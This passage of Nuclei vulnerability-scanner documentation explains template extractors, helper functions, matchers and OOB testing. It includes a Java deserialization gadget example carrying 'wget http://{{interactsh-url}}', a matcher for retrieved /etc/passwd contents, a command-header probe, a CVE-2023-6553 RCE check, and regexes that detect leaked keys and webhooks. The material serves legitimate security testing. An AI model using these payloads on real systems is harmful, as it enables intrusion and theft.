```yaml
extractors:
  - type: regex # type of the extractor
    part: body # part of the response (header,body,all)
    regex:
      - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" # regex to use for extraction.
```
### Kval Extractor
A **kval** extractor example to extract `content-type` header from HTTP Response.
```yaml
extractors:
- type: kval # type of the extractor
kval:
- content_type # header/cookie value to extract from response
```
Note that `content-type` has been replaced with `content_type` because the **kval** extractor does not accept dashes (`-`) as input; they must be substituted with underscores (`_`).
### JSON Extractor
A **json** extractor example to extract the value of the `id` object from a JSON block.
```yaml
- type: json # type of the extractor
  part: body
  name: user
  json:
    - '.[] | .id' # JQ like syntax for extraction
```
For more details about JQ - [https://github.com/stedolan/jq](https://github.com/stedolan/jq)
### Xpath Extractor
An **xpath** extractor example to extract the value of the `href` attribute from an HTML response.
```yaml
extractors:
- type: xpath # type of the extractor
attribute: href # attribute value to extract (optional)
xpath:
- '/html/body/div/p[2]/a' # xpath value for extraction
```
With a simple [copy and paste in the browser](https://www.scientecheasy.com/2020/07/find-xpath-chrome.html/), we can get the **xpath** value from any web page content.
### DSL Extractor
A **dsl** extractor example to extract the effective `body` length, via the `len` helper function, from an HTTP response.
```yaml
extractors:
- type: dsl # type of the extractor
dsl:
- len(body) # dsl expression value to extract from response
```
### Dynamic Extractor
Extractors can be used to capture dynamic values at runtime while writing multi-request templates. CSRF tokens, session headers, etc. can be extracted and used in subsequent requests. This feature is only available in RAW request format.
Example of defining a dynamic extractor with name `api` which will capture a regex based pattern from the request.
```yaml
extractors:
- type: regex
name: api
part: body
internal: true # Required for using dynamic variables
regex:
- "(?m)[0-9]{3,10}\\.[0-9]+"
```
The extracted value is stored in the variable **api**, which can be utilised in any section of the subsequent requests.
If you want to use extractor as a dynamic variable, you must use `internal: true` to avoid printing extracted values in the terminal.
An optional regex **match-group** can also be specified for the regex for more complex matches.
```yaml
extractors:
- type: regex # type of extractor
name: csrf_token # defining the variable name
part: body # part of response to look for
# group defines the matching group being used.
# In GO the "match" is the full array of all matches and submatches
# match[0] is the full match
# match[n] is the submatches. Most often we'd want match[1] as depicted below
group: 1
regex:
- ''
```
The above extractor with name `csrf_token` will hold the value extracted by `([[:alnum:]]{16})`, e.g., `abcdefgh12345678`.
If no group option is provided with this regex, the extractor will hold the full match (by `<input name="csrf_token" value="([[:alnum:]]{16})" />`), e.g., `<input name="csrf_token" value="abcdefgh12345678" />`.
### Reusable Dynamic Extractors
With Nuclei v3.1.4, you can reuse a dynamically extracted value (e.g., `csrf_token` in the above example) immediately in the next extractors; it is also available in subsequent requests by default.
Example:
```yaml
id: basic-raw-example

info:
  name: Test RAW Template
  author: pdteam
  severity: info

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: title
        group: 1
        regex:
          - '<title>(.*)<\/title>'
        internal: true

      - type: dsl
        dsl:
          - '"Title is " + title'
```
# Helper Functions
Review details on helper functions for Nuclei
Here is the list of all supported helper functions that can be used in RAW requests / network requests.
| Helper function | Description | Example | Output |
| ---------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| aes\_gcm(key, plaintext interface{}) \[]byte | AES GCM encrypts a string with key | `{{hex_encode(aes_gcm("AES256Key-32Characters1234567890", "exampleplaintext"))}}` | `ec183a153b8e8ae7925beed74728534b57a60920c0b009eaa7608a34e06325804c096d7eebccddea3e5ed6c4` |
| base64(src interface{}) string | Base64 encodes a string | `base64("Hello")` | `SGVsbG8=` |
| base64\_decode(src interface{}) \[]byte | Base64 decodes a string | `base64_decode("SGVsbG8=")` | `Hello` |
| base64\_py(src interface{}) string | Encodes string to base64 like python (with new lines) | `base64_py("Hello")` | `SGVsbG8=\n` |
| bin\_to\_dec(binaryNumber number \| string) float64 | Transforms the input binary number into a decimal format | `bin_to_dec("0b1010")` `bin_to_dec(1010)` | `10` |
| compare\_versions(versionToCheck string, constraints ...string) bool | Compares the first version argument with the provided constraints | `compare_versions('v1.0.0', '\>v0.0.1', '\<v1.0.1')` | `true` |
| date\_time(dateTimeFormat string, optionalUnixTime interface{}) string | Returns the formatted date time using simplified or go style layout for the current or the given unix time | `date_time("%Y-%M-%D %H:%m", 1654870680)` `date_time("2006-01-02 15:04", unix_time())` | `2022-06-10 14:18` |
| dec\_to\_hex(number number \| string) string | Transforms the input number into hexadecimal format | `dec_to_hex(7001)` | `1b59` |
| ends\_with(str string, suffix ...string) bool | Checks if the string ends with any of the provided substrings | `ends_with("Hello", "lo")` | `true` |
| generate\_java\_gadget(gadget, cmd, encoding interface{}) string | Generates a Java Deserialization Gadget | `generate_java_gadget("dns", "{{interactsh-url}}", "base64")` | `rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAAHQAAHEAfgAFdAAFcHh0ACpjYWhnMmZiaW41NjRvMGJ0MHRzMDhycDdlZXBwYjkxNDUub2FzdC5mdW54` |
| generate\_jwt(json, algorithm, signature, unixMaxAge) \[]byte | Generates a JSON Web Token (JWT) using the claims provided in a JSON string, the signature, and the specified algorithm | `generate_jwt("{\"name\":\"John Doe\",\"foo\":\"bar\"}", "HS256", "hello-world")` | `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIiLCJuYW1lIjoiSm9obiBEb2UifQ.EsrL8lIcYJR_Ns-JuhF3VCllCP7xwbpMCCfHin_WT6U` |
| gzip(input string) string | Compresses the input using GZip | `base64(gzip("Hello"))` | `+H4sIAAAAAAAA//JIzcnJBwQAAP//gonR9wUAAAA=` |
| gzip\_decode(input string) string | Decompresses the input using GZip | `gzip_decode(hex_decode("1f8b08000000000000fff248cdc9c907040000ffff8289d1f705000000"))` | `Hello` |
| hex\_decode(input interface{}) \[]byte | Hex decodes the given input | `hex_decode("6161")` | `aa` |
| hex\_encode(input interface{}) string | Hex encodes the given input | `hex_encode("aa")` | `6161` |
| hex\_to\_dec(hexNumber number \| string) float64 | Transforms the input hexadecimal number into decimal format | `hex_to_dec("ff")` `hex_to_dec("0xff")` | `255` |
| hmac(algorithm, data, secret) string | hmac function that accepts a hashing function type with data and secret | `hmac("sha1", "test", "scrt")` | `8856b111056d946d5c6c92a21b43c233596623c6` |
| html\_escape(input interface{}) string | HTML escapes the given input | `html_escape("<body>test</body>")` | `&lt;body&gt;test&lt;/body&gt;` |
| html\_unescape(input interface{}) string | HTML un-escapes the given input | `html_unescape("&lt;body&gt;test&lt;/body&gt;")` | `<body>test</body>` |
| join(separator string, elements ...interface{}) string | Joins the given elements using the specified separator | `join("_", 123, "hello", "world")` | `123_hello_world` |
| json\_minify(json) string | Minifies a JSON string by removing unnecessary whitespace | `json_minify("{ \"name\": \"John Doe\", \"foo\": \"bar\" }")` | `{"foo":"bar","name":"John Doe"}` |
| json\_prettify(json) string | Prettifies a JSON string by adding indentation | `json_prettify("{\"foo\":\"bar\",\"name\":\"John Doe\"}")` | `{\n \"foo\": \"bar\",\n \"name\": \"John Doe\"\n}` |
| len(arg interface{}) int | Returns the length of the input | `len("Hello")` | `5` |
| line\_ends\_with(str string, suffix ...string) bool | Checks if any line of the string ends with any of the provided substrings | `line_ends_with("Hello\nHi", "lo")` | `true` |
| line\_starts\_with(str string, prefix ...string) bool | Checks if any line of the string starts with any of the provided substrings | `line_starts_with("Hi\nHello", "He")` | `true` |
| md5(input interface{}) string | Calculates the MD5 (Message Digest) hash of the input | `md5("Hello")` | `8b1a9953c4611296a827abf8c47804d7` |
| mmh3(input interface{}) string | Calculates the MMH3 (MurmurHash3) hash of an input | `mmh3("Hello")` | `316307400` |
| oct\_to\_dec(octalNumber number \| string) float64 | Transforms the input octal number into a decimal format | `oct_to_dec("0o1234567")` `oct_to_dec(1234567)` | `342391` |
| print\_debug(args ...interface{}) | Prints the value of a given input or expression. Used for debugging. | `print_debug(1+2, "Hello")` | `3 Hello` |
| rand\_base(length uint, optionalCharSet string) string | Generates a random sequence of given length string from an optional charset (defaults to letters and numbers) | `rand_base(5, "abc")` | `caccb` |
| rand\_char(optionalCharSet string) string | Generates a random character from an optional character set (defaults to letters and numbers) | `rand_char("abc")` | `a` |
| rand\_int(optionalMin, optionalMax uint) int | Generates a random integer between the given optional limits (defaults to 0 - MaxInt32) | `rand_int(1, 10)` | `6` |
| rand\_text\_alpha(length uint, optionalBadChars string) string | Generates a random string of letters, of given length, excluding the optional cutset characters | `rand_text_alpha(10, "abc")` | `WKozhjJWlJ` |
| rand\_text\_alphanumeric(length uint, optionalBadChars string) string | Generates a random alphanumeric string, of given length without the optional cutset characters | `rand_text_alphanumeric(10, "ab12")` | `NthI0IiY8r` |
| rand\_ip(cidr ...string) string | Generates a random IP address | `rand_ip("192.168.0.0/24")` | `192.168.0.171` |
| rand\_text\_numeric(length uint, optionalBadNumbers string) string | Generates a random numeric string of given length without the optional set of undesired numbers | `rand_text_numeric(10, 123)` | `0654087985` |
| regex(pattern, input string) bool | Tests the given regular expression against the input string | `regex("H([a-z]+)o", "Hello")` | `true` |
| remove\_bad\_chars(input, cutset interface{}) string | Removes the desired characters from the input | `remove_bad_chars("abcd", "bc")` | `ad` |
| repeat(str string, count uint) string | Repeats the input string the given amount of times | `repeat("../", 5)` | `../../../../../` |
| replace(str, old, new string) string | Replaces a given substring in the given input | `replace("Hello", "He", "Ha")` | `Hallo` |
| replace\_regex(source, regex, replacement string) string | Replaces substrings matching the given regular expression in the input | `replace_regex("He123llo", "(\\d+)", "")` | `Hello` |
| reverse(input string) string | Reverses the given input | `reverse("abc")` | `cba` |
| sha1(input interface{}) string | Calculates the SHA1 (Secure Hash 1) hash of the input | `sha1("Hello")` | `f7ff9e8b7bb2e09b70935a5d785e0cc5d9d0abf0` |
| sha256(input interface{}) string | Calculates the SHA256 (Secure Hash 256) hash of the input | `sha256("Hello")` | `185f8db32271fe25f561a6fc938b2e264306ec304eda518007d1764826381969` |
| starts\_with(str string, prefix ...string) bool | Checks if the string starts with any of the provided substrings | `starts_with("Hello", "He")` | `true` |
| to\_lower(input string) string | Transforms the input into lowercase characters | `to_lower("HELLO")` | `hello` |
| to\_unix\_time(input string, layout string) int | Parses a string date time using default or user given layouts, then returns its Unix timestamp | `to_unix_time("2022-01-13T16:30:10+00:00")` `to_unix_time("2022-01-13 16:30:10")` `to_unix_time("13-01-2022 16:30:10", "02-01-2006 15:04:05")` | `1642091410` |
| to\_upper(input string) string | Transforms the input into uppercase characters | `to_upper("hello")` | `HELLO` |
| trim(input, cutset string) string | Returns a slice of the input with all leading and trailing Unicode code points contained in cutset removed | `trim("aaaHelloddd", "ad")` | `Hello` |
| trim\_left(input, cutset string) string | Returns a slice of the input with all leading Unicode code points contained in cutset removed | `trim_left("aaaHelloddd", "ad")` | `Helloddd` |
| trim\_prefix(input, prefix string) string | Returns the input without the provided leading prefix string | `trim_prefix("aaHelloaa", "aa")` | `Helloaa` |
| trim\_right(input, cutset string) string | Returns a string, with all trailing Unicode code points contained in cutset removed | `trim_right("aaaHelloddd", "ad")` | `aaaHello` |
| trim\_space(input string) string | Returns a string, with all leading and trailing white space removed, as defined by Unicode | `trim_space(" Hello ")` | `"Hello"` |
| trim\_suffix(input, suffix string) string | Returns input without the provided trailing suffix string | `trim_suffix("aaHelloaa", "aa")` | `aaHello` |
| unix\_time(optionalSeconds uint) float64 | Returns the current Unix time (number of seconds elapsed since January 1, 1970 UTC) with the added optional seconds | `unix_time(10)` | `1639568278` |
| url\_decode(input string) string | URL decodes the input string | `url_decode("https:%2F%2Fprojectdiscovery.io%3Ftest=1")` | `https://projectdiscovery.io?test=1` |
| url\_encode(input string) string | URL encodes the input string | `url_encode("https://projectdiscovery.io/test?a=1")` | `https%3A%2F%2Fprojectdiscovery.io%2Ftest%3Fa%3D1` |
| wait\_for(seconds uint) | Pauses the execution for the given amount of seconds | `wait_for(10)` | `true` |
| zlib(input string) string | Compresses the input using Zlib | `base64(zlib("Hello"))` | `eJzySM3JyQcEAAD//wWMAfU=` |
| zlib\_decode(input string) string | Decompresses the input using Zlib | `zlib_decode(hex_decode("789cf248cdc9c907040000ffff058c01f5"))` | `Hello` |
| resolve(host string, format string) string | Resolves a host using a dns type that you define | `resolve("localhost",4)` | `127.0.0.1` |
| ip\_format(ip string, format string) string | It takes an input ip and converts it to another format according to this [legend](https://github.com/projectdiscovery/mapcidr/wiki/IP-Format-Index), the second parameter indicates the conversion index and must be between 1 and 11 | `ip_format("127.0.0.1", 3)` | `0177.0.0.01` |
## Deserialization helper functions
Nuclei allows payload generation for a few common gadgets from [ysoserial](https://github.com/frohoff/ysoserial).
**Supported Payload:**
* `dns` (URLDNS)
* `commons-collections3.1`
* `commons-collections4.0`
* `jdk7u21`
* `jdk8u20`
* `groovy1`
**Supported encodings:**
* `base64` (default)
* `gzip-base64`
* `gzip`
* `hex`
* `raw`
**Deserialization helper function format:**
```yaml
{{ generate_java_gadget(payload, cmd, encoding) }}
```
**Deserialization helper function example:**
```yaml
{{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}}
```
## JSON helper functions
Nuclei allows manipulating JSON strings in different ways; here is a list of its functions:
* `generate_jwt`, to generate a JSON Web Token (JWT) using the claims provided in a JSON string, the signature, and the specified algorithm.
* `json_minify`, to minify a JSON string by removing unnecessary whitespace.
* `json_prettify`, to prettify a JSON string by adding indentation.
**Examples**
**`generate_jwt`**
To generate a JSON Web Token (JWT), you have to supply the JSON that you want to sign, *at least*.
Here is a list of supported algorithms for generating JWTs with `generate_jwt` function *(case-insensitive)*:
* `HS256`
* `HS384`
* `HS512`
* `RS256`
* `RS384`
* `RS512`
* `PS256`
* `PS384`
* `PS512`
* `ES256`
* `ES384`
* `ES512`
* `EdDSA`
* `NONE`
Empty string ("") also means `NONE`.
Format:
```yaml
{{ generate_jwt(json, algorithm, signature, maxAgeUnix) }}
```
> Arguments other than `json` are optional.
Example:
```yaml
variables:
  json: | # required
    {
      "foo": "bar",
      "name": "John Doe"
    }
  alg: "HS256" # optional
  sig: "this_is_secret" # optional
  age: '{{to_unix_time("2032-12-30T16:30:10+00:00")}}' # optional
  jwt: '{{generate_jwt(json, "{{alg}}", "{{sig}}", "{{age}}")}}'
```
> The `maxAgeUnix` argument is to set the expiration `"exp"` JWT standard claim, as well as the `"iat"` claim when you call the function.
**`json_minify`**
Format:
```yaml
{{ json_minify(json) }}
```
Example:
```yaml
variables:
  json: |
    {
      "foo": "bar",
      "name": "John Doe"
    }
  minify: "{{json_minify(json)}}"
```
`minify` variable output:
```json
{ "foo": "bar", "name": "John Doe" }
```
**`json_prettify`**
Format:
```yaml
{{ json_prettify(json) }}
```
Example:
```yaml
variables:
  json: '{"foo":"bar","name":"John Doe"}'
  pretty: "{{json_prettify(json)}}"
```
`pretty` variable output:
```json
{
"foo": "bar",
"name": "John Doe"
}
```
**`resolve`**
Format:
```yaml
{{ resolve(host, format) }}
```
Here is a list of formats available for the dns type:
* `4` or `a`
* `6` or `aaaa`
* `cname`
* `ns`
* `txt`
* `srv`
* `ptr`
* `mx`
* `soa`
* `caa`
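A sketch of using `resolve` with a named format inside a template variable (the hostname is illustrative):
```yaml
variables:
  # illustrative: look up the CNAME record for a host
  cname: '{{resolve("blog.projectdiscovery.io", "cname")}}'
```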
## Examples
For more examples, see the [helper function examples](/templates/reference/helper-functions-examples)
# Javascript Helper Functions
Available JS helper functions that can be used in the global JS runtime and in protocol-specific helpers.
## Javascript Runtime
| Name | Description | Signatures |
| -------------- | -------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------- |
| atob | Base64 decodes a given string | `atob(string) string` |
| btoa | Base64 encodes a given string | `btoa(string) string` |
| to\_json | Converts a given object to JSON | `to_json(any) object` |
| dump\_json | Prints a given object as JSON in console | `dump_json(any)` |
| to\_array | Sets/Updates objects prototype to array to enable Array.XXX functions | `to_array(any) array` |
| hex\_to\_ascii | Converts a given hex string to ascii | `hex_to_ascii(string) string` |
| Rand | Rand returns a random byte slice of length n | `Rand(n int) []byte` |
| RandInt | RandInt returns a random int | `RandInt() int` |
| log | log prints given input to stdout with \[JS] prefix for debugging purposes | `log(msg string)`, `log(msg map[string]interface{})` |
| getNetworkPort | getNetworkPort registers defaultPort and returns defaultPort if it is a colliding port with other protocols | `getNetworkPort(port string, defaultPort string) string` |
| isPortOpen | isPortOpen checks if given TCP port is open on host. timeout is optional and defaults to 5 seconds | `isPortOpen(host string, port string, [timeout int]) bool` |
| isUDPPortOpen | isUDPPortOpen checks if the given UDP port is open on the host. Timeout is optional and defaults to 5 seconds. | `isUDPPortOpen(host string, port string, [timeout int]) bool` |
| ToBytes | ToBytes converts given input to byte slice | `ToBytes(...interface{}) []byte` |
| ToString | ToString converts given input to string | `ToString(...interface{}) string` |
| Export | Converts a given value to a string and is appended to output of script | `Export(value any)` |
| ExportAs | Exports given value with specified key and makes it available in DSL and response | `ExportAs(key string,value any)` |
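A short sketch combining a few of these helpers in a protocol code block (the host/port handling is illustrative):
```yaml
javascript:
  - code: |
      // isPortOpen falls back to its default 5-second timeout here
      if (isPortOpen(Host, Port)) {
        log('port open');                            // printed with a [JS] prefix
        ExportAs('probe', hex_to_ascii('50494e47')); // decodes to "PING"
      }
    args:
      Host: "{{Host}}"
      Port: "22"
```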
## Template Flow
| Name | Description | Signatures |
| ------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------- |
| log | Logs a given object/message to stdout (only for debugging purposes) | `log(obj any) any` |
| iterate | Normalizes and iterates over all arguments (can be a string, array, null, etc.) and returns an array of objects. Note: if the object type is unknown (i.e., could be a string or array), iterate should be used and it will always return an array of strings | `iterate(...any) []any` |
| Dedupe | De-duplicates given values and returns a new array of unique values | `new Dedupe()` |
## Code Protocol
| Name | Description | Signatures |
| --------- | --------------------------------------------------- | ------------------ |
| OS | OS returns the current OS | `OS() string` |
| IsLinux | IsLinux checks if the current OS is Linux | `IsLinux() bool` |
| IsWindows | IsWindows checks if the current OS is Windows | `IsWindows() bool` |
| IsOSX | IsOSX checks if the current OS is OSX | `IsOSX() bool` |
| IsAndroid | IsAndroid checks if the current OS is Android | `IsAndroid() bool` |
| IsIOS | IsIOS checks if the current OS is IOS | `IsIOS() bool` |
| IsJS | IsJS checks if the current OS is JS | `IsJS() bool` |
| IsFreeBSD | IsFreeBSD checks if the current OS is FreeBSD | `IsFreeBSD() bool` |
| IsOpenBSD | IsOpenBSD checks if the current OS is OpenBSD | `IsOpenBSD() bool` |
| IsSolaris | IsSolaris checks if the current OS is Solaris | `IsSolaris() bool` |
| Arch | Arch returns the current architecture | `Arch() string` |
| Is386 | Is386 checks if the current architecture is 386 | `Is386() bool` |
| IsAmd64 | IsAmd64 checks if the current architecture is Amd64 | `IsAmd64() bool` |
| IsARM | IsArm checks if the current architecture is Arm | `IsARM() bool` |
| IsARM64 | IsArm64 checks if the current architecture is Arm64 | `IsARM64() bool` |
| IsWasm | IsWasm checks if the current architecture is Wasm | `IsWasm() bool` |
## JavaScript Protocol
| Name | Description | Signatures |
| ------------- | ---------------------------------------------------------------------------------------------- | ------------------------------------ |
| set | set variable from init code. this function is available in init code block only | `set(string, interface{})` |
| updatePayload | update/override any payload from init code. this function is available in init code block only | `updatePayload(string, interface{})` |
# Matchers
Review details on matchers for Nuclei
Matchers allow different types of flexible comparisons on protocol responses. They are what make Nuclei so powerful: checks are very simple to write, and multiple checks can be added as needed for very effective scanning.
### Types
Multiple matchers can be specified in a request. There are basically 7 types of matchers:
| Matcher Type | Part Matched |
| ------------ | --------------------------- |
| status | Integer Comparisons of Part |
| size | Content Length of Part |
| word | Part for a protocol |
| regex | Part for a protocol |
| binary | Part for a protocol |
| dsl | Part for a protocol |
| xpath | Part for a protocol |
To match status codes for responses, you can use the following syntax.
```yaml
matchers:
# Match the status codes
- type: status
# Some status codes we want to match
status:
- 200
- 302
```
To match binary for hexadecimal responses, you can use the following syntax.
```yaml
matchers:
- type: binary
binary:
- "504B0304" # zip archive
- "526172211A070100" # RAR archive version 5.0
- "FD377A585A0000" # xz tar.xz archive
condition: or
part: body
```
Matchers also support hex encoded data which will be decoded and matched.
```yaml
matchers:
- type: word
encoding: hex
words:
- "50494e47"
part: body
```
**Word** and **Regex** matchers can be further configured depending on the needs of the users.
**XPath** matchers use XPath queries to match XML and HTML responses. If the XPath query returns any results, it's considered a match.
```yaml
matchers:
- type: xpath
part: body
xpath:
- "/html/head/title[contains(text(), 'Example Domain')]"
```
Complex matchers of type **dsl** allow building more elaborate expressions with helper functions. These functions allow access to the protocol response, which contains a variety of data based on each protocol. See the protocol-specific documentation to learn about the different returned results.
```yaml
matchers:
- type: dsl
dsl:
- "len(body)<1024 && status_code==200" # Body length less than 1024 and 200 status code
- "contains(toupper(body), md5(cookie))" # Check if the MD5 sum of cookies is contained in the uppercase body
```
Every part of a protocol response can be matched with the DSL matcher. Some examples:
| Response Part | Description | Example |
| --------------- | ----------------------------------------------- | ----------------------- |
| content\_length | Content-Length Header | content\_length >= 1024 |
| status\_code | Response Status Code | status\_code==200 |
| all\_headers | Unique string containing all headers | len(all\_headers) |
| body | Body as string | len(body) |
| header\_name | Lowercase header name with `-` converted to `_` | len(user\_agent) |
| raw | Headers + Response | len(raw) |
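For example, several of these parts can be combined in one expression (the `nginx` check is illustrative):
```yaml
matchers:
  - type: dsl
    dsl:
      - "status_code == 200"
      - "content_length < 1024"
      - "contains(to_lower(all_headers), 'nginx')" # illustrative header check
    condition: and
```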
### Conditions
Multiple words and regexes can be specified in a single matcher and can be configured with different conditions like **AND** and **OR**.
1. **AND** - Using the AND condition requires all the words from the list to match. The request is marked as successful only when all the words have been matched.
2. **OR** - Using the OR condition requires a single word from the list to match. The request is marked as successful when even one of the words is matched.
### Matched Parts
Multiple parts of the response can also be matched for the request; the default matched part is `body` if not defined.
Example matchers for HTTP response body using the AND condition:
```yaml
matchers:
# Match the body word
- type: word
# Some words we want to match
words:
- "[core]"
- "[config]"
# Both words must be found in the response body
condition: and
# We want to match request body (default)
part: body
```
Similarly, matchers can be written to match anything that you want to find in the response body allowing unlimited creativity and extensibility.
### Negative Matchers
All types of matchers also support negative conditions, which are mostly useful when you look for a match with exclusions. This can be used by adding `negative: true` in the **matchers** block.
Here is an example syntax using the `negative` condition; this will return all the URLs that do not have `PHPSESSID` in the response header.
```yaml
matchers:
- type: word
words:
- "PHPSESSID"
part: header
negative: true
```
### Multiple Matchers
Multiple matchers can be used in a single template to fingerprint multiple conditions with a single request.
Here is an example of syntax for multiple matchers.
```yaml
matchers:
- type: word
name: php
words:
- "X-Powered-By: PHP"
- "PHPSESSID"
part: header
- type: word
name: node
words:
- "Server: NodeJS"
- "X-Powered-By: nodejs"
condition: or
part: header
- type: word
name: python
words:
- "Python/2."
- "Python/3."
condition: or
part: header
```
### Matchers Condition
When using multiple matchers, the default condition is an OR operation between all the matchers. An AND operation can be used to return a result only if all matchers return true.
```yaml
matchers-condition: and
matchers:
- type: word
words:
- "X-Powered-By: PHP"
- "PHPSESSID"
condition: or
part: header
- type: word
words:
- "PHP"
part: body
```
### Internal Matchers
When writing multi-protocol or `flow`-based templates, there might be a case where we need to validate/match the first request and then proceed to the next request. A good example of this is [`CVE-2023-6553`](https://github.com/projectdiscovery/nuclei-templates/blob/c5be73e328ebd9a0c122ea0324f60bbdd7eb940d/http/cves/2023/CVE-2023-6553.yaml#L21).
In this template, we first check whether the target is actually using the `Backup Migration` plugin using matchers, and only if that is true do we proceed to the next request with the help of `flow`.
But this would print two results, one for each request match. Since the first request's matchers are only a pre-condition for proceeding to the next request, we can mark them as internal using `internal: true` in the matchers block.
```yaml
id: CVE-2023-6553
info:
  name: WordPress Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution
author: FLX
severity: critical
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/backup-backup/readme.txt"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Backup Migration")'
condition: and
internal: true # <- updated logic (this will skip printing this event/result)
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php"
headers:
Content-Dir: "{{rand_text_alpha(10)}}"
matchers:
- type: dsl
dsl:
- 'len(body) == 0'
- 'status_code == 200'
- '!contains(body, "Incorrect parameters")'
condition: and
```
### Global Matchers
Global matchers are essentially `matchers` that apply globally across all HTTP responses received from running other templates. This makes them super useful for things like passive detection, fingerprinting, spotting errors, WAF detection, identifying unusual behaviors, or even catching secrets and information leaks. By setting `global-matchers` to **true**, you're enabling the template to automatically match events triggered by other templates without having to configure them individually.
* Global matchers only work with [HTTP-protocol-based](/templates/protocols/http) templates.
* When global matchers are enabled, no requests defined in the template will be sent.
* This feature is not limited to `matchers`; you can also define `extractors` in a global matchers template.
Let's look at a quick example of how this works:
```yaml
# http-template-with-global-matchers.yaml
http:
- global-matchers: true
matchers-condition: or
matchers:
- type: regex
name: asymmetric_private_key
regex:
- '-----BEGIN ((EC|PGP|DSA|RSA|OPENSSH) )?PRIVATE KEY( BLOCK)?-----'
part: body
- type: regex
name: slack_webhook
regex:
- >-
https://hooks.slack.com/services/T[a-zA-Z0-9_]{8,10}/B[a-zA-Z0-9_]{8,12}/[a-zA-Z0-9_]{23,24}
part: body
```
In this example, we're using a template that has `global-matchers` set to **true**. It looks for specific patterns, like an asymmetric private key or a Slack webhook, across all HTTP requests. Now, when you run this template along with others, the global matcher will automatically check for those patterns in all HTTP responses. You don't have to set up individual matchers in every single template for it to work.
To run it, use a command like this:
```console
> nuclei -u http://example.com -t http-template-with-global-matchers.yaml -t http-template-1.yaml -t http-template-2.yaml -silent
[http-template-with-global-matchers:asymmetric_private_key] http://example.com/request-from-http-template-1
[http-template-with-global-matchers:slack_webhook] http://example.com/request-from-http-template-2
```
In this case, the global matchers are looking for an asymmetric private key and a Slack webhook. As you can see in the output, it found a match in requests from the other templates, even though the matching logic was only defined once in the global matchers template. This makes it really efficient for detecting patterns across multiple requests without duplicating code in every single template.
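Because extractors are also supported in global matcher templates (see the notes above), the same mechanism can capture data passively. A minimal sketch, with a hypothetical JWT-shaped regex:
```yaml
# http-template-with-global-extractor.yaml
http:
  - global-matchers: true
    extractors:
      - type: regex
        name: jwt
        regex:
          - 'eyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}'
        part: body
```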
# OOB Testing
Understanding OOB testing with Nuclei Templates
Since the release of [Nuclei v2.3.6](https://github.com/projectdiscovery/nuclei/releases/tag/v2.3.6), Nuclei supports using the [interactsh](https://github.com/projectdiscovery/interactsh) API to achieve OOB-based vulnerability scanning with automatic request correlation built in. It's as easy as writing `{{interactsh-url}}` anywhere in the request and adding a matcher for `interactsh_protocol`. Nuclei handles correlation of the interaction to the template and the request it was generated from, allowing effortless OOB scanning.
## Interactsh Placeholder
`{{interactsh-url}}` placeholder is supported in **http** and **network** requests.
An example of a Nuclei request with the `{{interactsh-url}}` placeholder is provided below. Placeholders are replaced at runtime with unique interactsh URLs.
```yaml
- raw:
- |
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
```
## Interactsh Matchers
Interactsh interactions can be used with `word`, `regex` or `dsl` matchers/extractors using the following parts.
| part |
| -------------------- |
| interactsh\_protocol |
| interactsh\_request |
| interactsh\_response |
**interactsh\_protocol**
The value can be `dns`, `http` or `smtp`. This is the standard matcher for every interactsh-based template, with `dns` as the most common value since DNS interactions are very non-intrusive in nature.
**interactsh\_request**
The request that the interactsh server received.
**interactsh\_response**
The response that the interactsh server sent to the client.
Example of Interactsh DNS Interaction matcher:
```yaml
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
```
Example of an HTTP interaction matcher combined with a regex matcher on the interaction content:
```yaml
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: regex
part: interactsh_request # Confirms the retrieval of /etc/passwd file
regex:
- "root:[x*]:0:0:"
```
# Preprocessors
Review details on pre-processors for Nuclei
Certain pre-processors can be specified globally anywhere in the template. They run as soon as the template is loaded, to achieve things like random IDs generated once per template run.
### randstr
Generates a [random ID](https://github.com/rs/xid) for a template on each nuclei run. It can be used anywhere in the template and will always contain the same value within a run. `randstr` can be suffixed by a number, and a new random ID will be created for each such name too, e.g. `{{randstr_1}}`, which will likewise remain the same across the template.
`randstr` is also supported within matchers and can be used to match the inputs.
For example:
```yaml
http:
- method: POST
path:
- "{{BaseURL}}/level1/application/"
headers:
cmd: echo '{{randstr}}'
matchers:
- type: word
words:
- '{{randstr}}'
```
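To illustrate the suffixed form, here is a minimal sketch (the paths are hypothetical) in which `{{randstr}}` and `{{randstr_1}}` each hold their own value that stays constant across the template:
```yaml
http:
  - method: GET
    path:
      - "{{BaseURL}}/{{randstr}}"    # first random ID
      - "{{BaseURL}}/{{randstr_1}}"  # a second, independent random ID
    matchers:
      - type: word
        words:
          - "{{randstr}}"            # same value as used in the first path
```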
# Template Signing
